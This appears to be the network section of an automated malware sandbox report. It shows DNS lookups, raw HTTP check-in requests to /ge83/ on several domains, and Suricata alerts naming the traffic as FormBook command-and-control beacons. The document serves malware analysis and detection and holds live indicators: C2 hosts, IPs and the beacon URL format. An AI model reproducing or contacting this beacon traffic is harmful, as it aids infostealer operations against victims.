Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.olliex.com |
CNAME
olliex.com
|
45.14.226.43 |
www.anchordp.com | ||
www.xrtrump.com | 3.64.163.50 |
GET
301
http://www.olliex.com/ge83/?lhr0k=bJEK5Jm7WtjeGb58dlxSpip3Qi8DTbeKN4BEwykpD1a0K75BQ+Ulqj9ctO7dFfZ/D7qGoN33&1bm=3fedQNGPaRzlHp
REQUEST
RESPONSE
BODY
GET /ge83/?lhr0k=bJEK5Jm7WtjeGb58dlxSpip3Qi8DTbeKN4BEwykpD1a0K75BQ+Ulqj9ctO7dFfZ/D7qGoN33&1bm=3fedQNGPaRzlHp HTTP/1.1
Host: www.olliex.com
Connection: close
HTTP/1.1 301 Moved Permanently
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
content-type: text/html; charset=UTF-8
x-redirect-by: WordPress
location: http://olliex.com/ge83/?lhr0k=bJEK5Jm7WtjeGb58dlxSpip3Qi8DTbeKN4BEwykpD1a0K75BQ+Ulqj9ctO7dFfZ/D7qGoN33&1bm=3fedQNGPaRzlHp
content-length: 0
date: Wed, 05 Jul 2023 08:29:25 GMT
server: LiteSpeed
connection: close
GET
410
http://www.xrtrump.com/ge83/?lhr0k=RsNUPwAO2TiU0GJGzJ/y8Ps7GcAlTmqePcUTt21A+tZOBeFu31OAHszpaf+FVOusF523Z9IY&1bm=3fedQNGPaRzlHp
REQUEST
RESPONSE
BODY
GET /ge83/?lhr0k=RsNUPwAO2TiU0GJGzJ/y8Ps7GcAlTmqePcUTt21A+tZOBeFu31OAHszpaf+FVOusF523Z9IY&1bm=3fedQNGPaRzlHp HTTP/1.1
Host: www.xrtrump.com
Connection: close
HTTP/1.1 410 Gone
Server: openresty
Date: Wed, 05 Jul 2023 08:29:44 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49167 -> 3.64.163.50:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49167 -> 3.64.163.50:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49167 -> 3.64.163.50:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49166 -> 45.14.226.43:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49166 -> 45.14.226.43:80 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.101:49166 -> 45.14.226.43:80 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts